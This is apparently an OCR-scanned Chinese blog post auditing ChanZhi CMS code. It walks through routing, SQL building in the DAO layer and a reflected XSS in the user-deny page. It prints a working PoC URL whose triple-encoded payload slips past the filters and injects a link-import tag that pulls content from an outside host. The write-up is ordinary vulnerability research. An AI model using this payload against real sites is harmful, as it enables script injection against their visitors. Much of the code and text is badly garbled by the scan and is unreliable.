蝉 知 cms 代 人 码 审 计 小 记 
路 由 


打开 index.php， 观 察 到 框架 首先 解析 了 请 求 ， 然 后 检查 了 权限 〔( 跟 躁 进去 能 看 见 具体 有 哪些 模块 是 前 台 可 以 直接 访问 的 ， 哪 些 是 guest 可 以 访问 的 ) ， 最 后 加 载 模 块 。 








$app->parseRequest () ; 
$common->checkPriv () ; 


$app—> loadModule () ; 


跟 进 去 就 可 以 发 现 路 由 是 什么 样 ， 这 里 直接 给 结论 ， 默 认 根 据 REQUEST_TYPE 路 由 ,前 台 REQUEST_TYPE 为 PATH _INFO, 后 台 为 GET， 若 RequestType 为 
PATH_INFO， 则 路 由 为 /index.php/model-function-param1-param2... 


否 RequestType 为 GET， 则 取 参 数 m、f 为 model 与 function， 主 要 看 前 台 。 


DAO 


cms 中 最 有 价值 的 是 直接 getshell 与 Sql 注入， 首先 审计 sql 注 入 ，mvc 架 构 中 sgl 语句 由 特定 方法 拼接 ， 按 照 规 范 来 很 难 出 问题 ， 所 以 首先 看 sql 是 如 何 拼 接 的 ， 打 开 
dao.class.php， 纵 观 所 有 方法 ， 我 们 可 以 发 现 ， 








1.data 方 法 对 传 入 的 对 象 检查 ， 如 果 属 性 名 出 现 非 字母 直接 销毁 属性 ， 如 果 非 ， 拼 接 sql 语 句 ， 对 属性 值 做 addslashes 人 处 理 。 





2.set 方 法 直接 增加 字段 拼接 到 sql 中 危险 方法 


3.eq， 拼 接 等 于 号 的 ， 经 过 addslashes 处 理 





4. 其 余 没 有 处 理 过 的 地 方 均 为 表明 或 字段 名 传 入 的 地 方 ， 不 排除 但 是 基本 没有 





综 上 所 述 ， 符 在 set 方 法 中 传 入 变量 则 有 可 能 导致 sql 注 入 ， 全 局 搜索 "->set("， 找 到 两 处 可 以 传 入 变量 的 地 方 ， 一 处 已 经 由 乐师 全 审计 得 到 一 个 注入 
(http: .yqxi c X. archives/308/) ， 具 体 看 乐师 傅 的 文章 ， 是 package model 中 不 会 被 用 到 的 一 个 方法 ， 还 有 一 处 代入 的 是 数 




















A am 
输出 位 置 

这 个 还 没 怎么 找 就 控 到 了 一 个 ， 还 是 比较 凑巧 的 ， 本 来 在 调试 一 个 user 中 的 方法 ， 结 果断 点 没 断 下 来 ， 发 现 自己 没 登 录 ， 就 单 步 调 跟 过 去 ， 发 现 调用 了 不 允许 的 方法 的 时 
候 会 自动 调用 user 中 的 deny 方 法 ， 在 看 路 由 的 时 候 发 现 对 传 入 的 内 容 urldecode 了 一 次 再 strip_tags, 看 了 下 该 页 面 的 输出 点 








输入 : index. php/user-deny-1-2 
输出 1: <link rel= alternate”media=“ only screen and (max-width: 640px)” href="http://localhost/chanzhieps/index. php/user-deny-1-2-. mhtml”> 


输出 2: “p> 抱 次 ， 您 无 权 访问 『“b>1</b>」 模块 的 『《%b>2</b>」 功 能。 请 联系 管理 员 获 取 权 限 。 点 击 后 退 返回 上 页 。“br/> 5 秒 钟 后 将 自动 返回 首页 ... 《</p> 





经 跟踪 输出 1 的 来 源 在 /system/module/user/control.php 259 行 


$this—>view—>mobi | eURL = helper::createLink( user’, ’deny’, “module=$module&method=$methodkreferer=$refererBeforeDeny”’, °’, ’ mhtm 
ae 


$this—>view->desktopURL = helper::createLink( user’, ’deny’, “module=$module&method=$methodkreferer=$refererBeforeDeny’, °’, htm 
ie 


mobileURL 的 第 三 个 参数 是 可 以 控制 的 ， 其 中 $method 与 $refererBeforeDeny 均 为 可 控 参 数 
跟 入 createLink 函 数 /system/fremework/helper.class.php 38 行 


static public function createLink ($moduleName, $methodName = ’ index’, $vars =’’, $alias = array(), $viewType =°’) 
{ 

global $app, $config; 

$clientLang = $app—>getClientLang(Q) ; 


$lang = $contig—> langCode: 


/* Set viewType is mhtml if visit with mobile. */ 


if (!$viewlype and RUN MODE == ’ front’ and $app—>clientDevice ==’ mobile’ and $methodName != ’ oauthCallback’) $viewType =’ mhtml’ ; 


/* Set vars and alias. */ 
iiis array (vane) parsa str C vars, Svars): 
if(!is_array($alias)) parse str($alias, $alias); 


foreach ($alias as $key => $value) $alias[$key] = urlencode ($value) ; 


/* Seo modules return directly. */ 
if ($config->requestType != GET and method exists( uri’, ’create’ . $moduleName . $methodName) ) 
{ 

if ($config—requestType == ’ PATH INF02 ) $config—>webRoot = $ SERVER[’ SCRIPT NAME’ ] . ’/’; 





$link = call user func array( uri::create . $moduleName . $methodName, array( param => $vars, alias =>$alias, viewType’ =>$viewTyp 


/* Add client lang. */ 


if ($lang and $link) $link = $config—->webRoot . $lang.’/ . substr($link, strlen($config—>webRoot) ) ; 


if ($config—>requestType == ’ PATH INF02 ) $config—>webRoot = getWebRoot () ; 
if ($link) return $link; 


/* Set the view type. */ 

if (empty ($viewType)) $viewType = $app—getViewTypeQ ; 

if ($config—-requestType == PATH INFO’) $link = $config—>webRoot; 

if ($config—requestType == ’ PATH INFO2’) $link = $ SERVER[’ SCRIPT NAME’ ] . ’/’; 


if ($config—->requestType == ’GET’) $link = $ SERVER[’ SCRIPT NAME’ |; 





if ($config—requestType != GET’ and $lang) $link .= “$lang/”; 


/* Common method. */ 
if ($config—>requestType != ’ GET’ ) 
{ 
/* If the method equal the default method defined in the config file and the vars is empty, convert the link. */ 
if ($methodName == $config->default—>method and empty ($vars) ) 
{ 
/* If the module also equal the default module, change index-index to index.html. */ 
if ($moduleName == $config—>default—>module) 
{ 
$link .= index.’ . $viewType; 
} 
elseif ($viewType == $app->getViewType()) 
{ 
$link .= $moduleName . ’/’ ; 


else 


$link .= $moduleName . ’.’ . $viewType; 


else 


} 


retu 


else 


$link .= “$moduleName {$config—>requestFix} $methodName’” ; 
foreach($vars as $value) $link .= ” {$config—requestFix} $value” : 


(iin =i ale yes 


$link .= ”? {$config-—>moduleVar} =$moduleName& {$config—>methodVar}=$methodName” ; 


if ($viewType != html’) $link .= “&{$config->viewVar}=" . $viewType; 
foreach($vars as $key => $value) $link .= “&$key=$value’ ; 


ice whanewandeR UNO Es Sadi n= =iane = 


nosie 


我 们 控制 的 部 分 ， 也 就 是 createLink 的 第 三 个 参数 $vars 进 入 了 


iOa s array Svars) parse str va Svars): 


parse_str 在 解析 字符 串 时 自 带 url 解 码 ， 于 是 造 这 里 有 了 绕 过 的 可 能 性 ， 任 何在 此 之 前 的 过 小 都 是 无 效 的 。 





那么 路 由 url 路 由 经 过 了 怎样 的 过 滤 呢 ， 跟 踪 进 入 /system/framework/base/router.class.php 1711 行 


public function mergeParams ($defaultParams, $passedParams) 


{ 


/* Remove these two params. */ 


unse 


unse 


t ($passedParams[’ onlybody’ ]) ; 


t ($passedParams |’ HTTP_X REQUESTED WITH’ ]); 


/* Check params from URL. */ 


fore 


{ 


$pas 
$i = 


ach($passedParams as $param => $value) 


if (preg match( /[ a-zA-Z0-9 \.]/, $param)) die( Bad Request!’ ); 


sedParams = array values ($passedParams) ; 


0; 


foreach ($defaultParams as $key => $defaultValue) 


{ 


if (isset ($passedParams|$i])) 


{ 


$defaultParams[|$key] = strip tags (urldecode ($passedParams[$i])) ; 


else 


if ($defaultValue —— JNO) SED) $this—-tricsertrror( Ihe param $key should pass value. 


} 


$i cer: 


return $defaultParams; 


3 


RD 


si 


LINE 





s Sexit = true). 


$defaultParams[$key] = strip tags(urldecode ($passedParams[$i])) ; 





先 urldecode 一 次 再 strip_tags 去 除 html 标 签 ， 看 似 万 无 一 失 ， 但 是 因为 在 head 部 分 输出 的 mobileURL 本 身 就 会 url 解 码 一 次 (详情 见 上 〉 ， 所 以 这 里 可 以 通过 三 次 编码 绕 过 


1. 传 递 给 服务 端 解码 一 次 
2. 通 过 路 由 解码 一 次 ， 通 过 strip_tags 
3. 生 成 mobileLink 时 又 解码 了 一 次 ， 完 整 输出 到 head 中 


PoC: index.php/user-deny- 
%22%25253E%25253Clink%252520rel%25253D%252522import%252522%252520href%25253D%252522https%25253Awww%25252emelodia%25252epw%25252f%25253 
%25253E 


于 是 这 里 就 构造 了 一 个 xss 


本 篇 小 记 总 结 两 个 点 


1 寻找 mvc 中 的 sq] 注 入 和 看 sql 语 句 是 如 何 拼接 的 ， 为 了 防止 出 现 坑 也 最 好 看 看 框架 入 口 对 输入 做 了 怎样 的 处 理 ， 看 完 如 何 拼接 后 总 结 可 能 是 怎样 的 利用 ， 怎 样 的 就 基本 不 
可 能 利用 ， 再 构造 一 个 正则 全 局 搜索 ， 相 信 可 以 节约 大 量 的 时 间 。 





2. 挖 掘 xss: 从 输出 看 大 臻 过滤， 再 看 入 口 如 何 过 滤 ， 再 完整 的 跟踪 一 过 ， 思 考 可 能 出 现 的 绕 过 方法 。 


与 圈 友 分 享 一 些 拙 见 ， 代 码 审 计 经 验 尚 浅 ， 还 望 多 多 交流 


